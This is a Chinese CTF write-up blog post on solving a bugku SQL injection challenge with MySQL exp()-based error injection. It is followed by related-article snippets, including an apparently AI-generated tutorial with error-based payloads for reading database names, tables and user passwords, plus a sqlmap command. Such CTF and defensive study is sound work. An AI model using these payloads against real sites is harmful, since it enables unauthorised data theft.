简单的sql注入之3 exp函数的使用

最新推荐文章于 2024-12-27 17:05:40 发布
最新推荐文章于 2024-12-27 17:05:40 发布
阅读量1.5k 收藏
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44077544/article/details/89955770
版权
博客围绕bugku简单的SQL注入之3展开。尝试用1‘报错,1“回显正常,推测为单引号情况。updatexml()函数被过滤后,采用exp()函数,并附上常见报错函数链接,还给出了payload。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

bugku – 简单的sql注入之3

用 1‘试了试,报错,让后1“回显正常。应该是单引号。既然报错,就试了试updatexml()这个函数,但发现被过滤了,所以用exp()这个函数,这里附上一些常见的报错函数:https://www.cnblogs.com/wocalieshenmegui/p/5917967.html

给出payload:

表名:
?id=1' and exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema=database())a))%23
字段名:
?id=1' and exp(~(select * from(select group_concat(column_name) from information_schema.columns where table_schema=database())a))%23

在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

【漏洞挖掘】——109、EXP报错注入深入刨析
Fly_鹏程万里
06-21 337
函数用法:exp(x)函数功能:返回e的x次方。
一篇学会SQL注入 | 详解SQL注入(基础向,基础到每个参数)
weixin_47075747的博客
06-14 1336
**括号里面的查询被称之为子查询,在执行顺序中子查询先执行,然后再执行外面的 select **2) 的值是确定性的,假随机。
编写sql注入最基础的exp
CC210231的博客
04-03 1655
下面直接上代码: 使用html编写: <!DOCTYPE html> <html > <head> <meta charset="UTF-8"> <title></title> </head> <body> <!-method根据实际情况选择,action属性中为提交的地址,name属性中为参数名,
第五十四章 SQL函数 EXP
yaoxin521123的博客
02-15 2360
文章目录第五十四章 SQL函数 EXP大纲参数描述示例 第五十四章 SQL函数 EXP 返回数字的指数(自然对数的倒数)的标量数值函数。 大纲 {fn EXP(expression)} 参数 expression - 对数指数,数值表达式。 EXP返回NUMERIC或DOUBLE数据类型。如果表达式的数据类型为DOUBLE,则EXP返回DOUBLE;否则返回NUMERIC。 描述 Exp是指数函数e n,其中e是常数2.718281828。因此,要返回e的值,可以指定{fn exp(1)}。Exp是自
SqlServer函数大全十九:EXP(指数)函数
yixiaobing的博客
03-09 1298
SQL Server 中,EXP函数用于计算自然数 e 的指定次幂。e 是一个数学常数,其值约为 2.71828。EXP函数接受一个数值作为参数,并返回 e 的该数值次幂。
sql注入分类及报错注入EXP
weixin_45626840的博客
01-20 875
sql注入分类原理,报错注入原理,EXP编写
SQL 细节知识积累
★(ChengKing)【夜战鹰】【产品级性能调优与故障诊断分析】★
11-06 5118
Transact_sql:  TRUNCATE TABLE test   //用于删除test表中的数据  CREATE FUNCTION        //创建用户自定义函数  ALTER FUNCTION         //语句修改  DROP FUNCTION          //除去用户定义函数  CREATE UNIQUE CLUSTERED INDEX client_id ON c
SQL注入中常见的函数
m0_74855736的博客
03-09 2294
SQL注入中常见的函数
SQL注入的报错注入函数
cyjmosthandsome的博客
02-26 7034
一、extractvalue() extractvalue(xml_frag,xpath_expr)函数接受两个参数,第一个为XML标记内容,也就是查询的内容,第二个为XPATH路径,也就是查询的路径。如果没有匹配内容,不管出于何种原因,只要xpath_expr有效,并且xml_frag由正确嵌套和关闭的元素组成 - 返回空字符串。不区分空元素的匹配和无匹配。但是如果X...
SQLEXP:一款强大的SQL注入利用工具
gitblog_00145的博客
09-13 945
SQLEXP:一款强大的SQL注入利用工具 SQLEXP SQL 注入利用工具,存在waf的情况下自定义编写tamper脚本 dump数据 项目地址: https://gitcode.com/gh_mirrors/sq/SQLEX...
SQL注入EXP编写
weixin_30448603的博客
04-20 608
0x00 盲注简介: 顾名思义,像盲人一样注入(什么鬼解释…),通俗来说,当我们发现有SQL注入时,确不能得到SQL查询的数据回显,除了之前的写文件方式,还有就是盲注了,盲注就是通过服务器返回的状态等各种因素来猜测,最终组合得到哦我们想要的数据。 0x01 盲注必须知识: SQL盲注中常用的几个内置函数,了解一下 length(str):返回str字符串的长度。 substr(str...
mysql数值处理函数exp_MySQL数据处理函数
weixin_39895684的博客
02-08 302
数据处理函数有时从数据库表中获取到的数据需要进行一些处理。如将小写字母替换为相应的大写字母。这个处理过程可以在客户机上进行,也可以在数据库上进行。数据库上进行会更高效。数据库中有相应的数据处理函数来处理这些数据,但是在SQL使用特殊的数据处理函数会降低其可移植性。不同的DBMS系统,其数据处理函数不同。大多数的SQL支持以下类型的函数用于处理文本串的函数,如删除、填充值、转换大小写;用于在数值数...
【知识积累】sql注入exp编写思路
告白的博客
04-16 818
SQL注入,通过注入获取账号和密码,熟悉 sql注入的原理方法;需要用到的模块:request模块和re正则模块 ,缺点:只适用于get请求的注入
mysql exp函数_五、MySQL函数
weixin_29119033的博客
01-27 662
函数表示对输入参数值返回一个具有特定关系的值MySQL提供大量丰富的函数在进行数据库管理以及数据的查询和操作时将会经常用到各种函数。通过对数据的处理数据库功能可以变得更加强大更加灵活地满足不同需求。各类函数从功能主要分为以下几类数学函数、字符串函数、日期和时间函数、条件判断函数、系统信息函数和加密函数。5.1、数学函数绝对值函数ABS(x)mysql>SELECTABS(2),ABS(-...
expsql 工作总结
阿城的博客
08-01 808
不要用OR ,用 in
Goby自定义编写EXP进阶篇:以SQL注入为例的高阶变量用法讲解
m0_46699477的博客
12-27 1115
在上一篇中,我们已经介绍了Goby PoC模板的基础构成,但是遇到更加复杂型的漏洞,需要用到一些特殊参数和自定义变量。我们以 SQL注入漏洞类型为例,讲解一些基础参数和变量的用法。
SQL注入常用函数及解析
柳岸花又明的博客
08-08 903
substr(): substr(string,start,length) 对于给定的字符串string,从start位开始截取,截取length的长度。 length:待提取的字符串长度,若length为下面情况,返回整个字符串的所有字符。
使用exp进行SQL报错注入
weixin_34082695的博客
08-27 694
0x01 前言概述好消息好消息~作者又在MySQL中发现了一个Double型数据溢出。如果你想了解利用溢出来注出数据,你可以读一下作者之前发的博文:BIGINT Overflow Error based injections,drops上面也有对应翻译,具体见这里。当我们拿到MySQL里的函数时,作者比较感兴趣的是其中的数学函数,它们也应该包含一些数据类型来保存数值。所以作者...
SQLEXP 2008 Install
Charles的专栏
02-28 632
The first time that SQLExp 2008 get installed, client connection (from either VS2010 or SQLServer Management Studio) always failed.Possible Reason1. "Allow Remote connection" not get ticked when SQLServer startsup.    Solution: in "Management Studio"=>Engi
SQL注入报错函数
最新发布
04-22
<think>好的,我现在需要帮助用户查找关于SQL注入中报错函数使用方法和示例。用户已经提供了一些引用内容,我需要结合这些引用来组织回答。 首先,用户提到了四个引用,其中引用1到4都涉及报错注入的不同方面。引用1解释了报错注入的基本原理,引用2和3提到了使用count()和floor()函数的例子,引用4讨论了updatexml和extractvalue函数使用。用户的上一次问题涉及时间盲注,现在转向报错注入,可能是在学习不同类型的注入方法。 我需要确保回答结构清晰,分点说明每个报错函数使用方法,并给出示例。同时,用户需要中文回答,所以要注意用词准确。根据用户提供的引用,报错函数包括floor()+rand()、updatexml、extractvalue等,可能还需要补充其他常见函数exp()。 接下来,我需要检查每个函数的原理、语法、示例payload,以及注意事项。比如,floor(rand()*2)在group by时导致主键冲突,从而引发报错,这个在引用2和3中提到过。updatexml和extractvalue则是利用XPath语法错误来触发报错,这在引用4中有说明。 还要考虑不同数据库的兼容性,比如MySQLSQL Server是否有不同的函数。用户提供的示例主要是MySQL,所以重点放在MySQL上。此外,需要提到防御措施,帮助用户了解如何防范这类攻击,比如参数化查询和错误信息处理。 用户可能还想知道如何自动化利用这些函数,比如使用sqlmap工具,但问题主要集中在手动使用方法上。因此,示例需要具体,比如如何获取数据库名、表名、字段名,每一步的payload如何构造。 最后,确保回答中的引用标记正确,例如引用[^1]、[^2]等,但根据用户提供的引用内容,可能需要调整引用编号,但用户示例中的引用是[^1]、[^2]、[^3]、[^4],所以保持原样。 总结回答结构: 1. 报错注入原理 2. 常用函数及示例(floor+rand、updatexml、extractvalue、exp3. 防御措施 4. 相关问题 需要确保每个函数都有详细的payload示例和解释,并注明对应的引用来源。同时,检查是否有遗漏的函数或方法,如geometrycollection等,但可能用户提供的引用中没有提到,可以暂时不提,或者简要提及。 现在开始组织内容,确保每个部分清晰,使用代码块和表格来展示示例,保持格式正确。</think>#### SQL注入报错函数使用方法详解 --- ### 一、报错注入核心原理 通过构造**特定SQL语句触发数据库报错**,将查询结果直接嵌入错误信息中返回[^1]。核心条件: 1. 应用程序未过滤错误信息(如开启`mysql_error()`输出) 2. 攻击者可控制输入参数 --- ### 二、常用报错函数及Payload示例 #### 1. `floor(rand()*2)` + `GROUP BY`(主键冲突) - **原理**:利用`GROUP BY`分组时产生的临时表主键冲突报错 - **典型Payload**: ```sql id=1&#39; AND (SELECT COUNT(*), CONCAT((SELECT DATABASE()), 0x7e, FLOOR(RAND(0)*2)) AS x FROM information_schema.tables GROUP BY x)-- ``` - 输出示例:`Duplicate entry &#39;database_name~1&#39; for key &#39;group_key&#39;`[^2] - **应用场景**: - 获取数据库名、表名、字段名 - 逐字符提取数据(配合`SUBSTRING`函数) #### 2. `updatexml()`(XPath语法错误) - **函数语法**: ```sql UPDATEXML(XML_document, XPath_string, new_value) ``` - **Payload构造**: ```sql id=1&#39; AND UPDATEXML(1, CONCAT(0x7e, (SELECT USER()), 0x7e), 1)-- ``` - 输出示例:`XPATH syntax error: &#39;~root@localhost~&#39;`[^4] - **限制**: - 单次最大输出长度32字符(需配合`SUBSTRING`分段获取) - 仅适用于MySQL 5.1.5+版本 #### 3. `extractvalue()`(XPath语法错误) - **函数语法**: ```sql EXTRACTVALUE(XML_document, XPath_string) ``` - **Payload示例**: ```sql id=1&#39; AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT @@version), 0x7e))-- ``` - 输出示例:`XPATH syntax error: &#39;~5.7.36-log~&#39;`[^4] #### 4. `exp()`(数值溢出报错) - **原理**:通过指数函数触发数值溢出错误 - **Payload示例**: ```sql id=1&#39; AND EXP(~(SELECT * FROM (SELECT USER())a))-- ``` - 输出示例:`DOUBLE value is out of range` --- ### 三、分阶段数据提取示例 #### 1. 获取数据库名 ```sql id=1&#39; AND UPDATEXML(1, CONCAT(0x7e, (SELECT DATABASE()), 0x7e), 1)-- ``` #### 2. 提取表名 ```sql id=1&#39; AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)))-- ``` #### 3. 读取字段值 ```sql id=1&#39; AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT password FROM users LIMIT 0,1), FLOOR(RAND(0)*2)) AS x FROM information_schema.tables GROUP BY x) a)-- ``` --- ### 四、防御措施 1. **禁用错误回显**:生产环境关闭`mysql_error()`输出[^4] 2. **参数化查询**: ```python cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,)) ``` 3. **函数黑名单**:过滤`updatexml`、`extractvalue`等关键词 4. **权限控制**:数据库账户仅授予最小必要权限 --- ### 五、工具辅助 使用`sqlmap`自动化注入(指定报错技术): ```bash sqlmap -u "http://example.com?id=1" --technique=E ``` 参数说明:`--technique=E` 表示使用报错注入技术 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值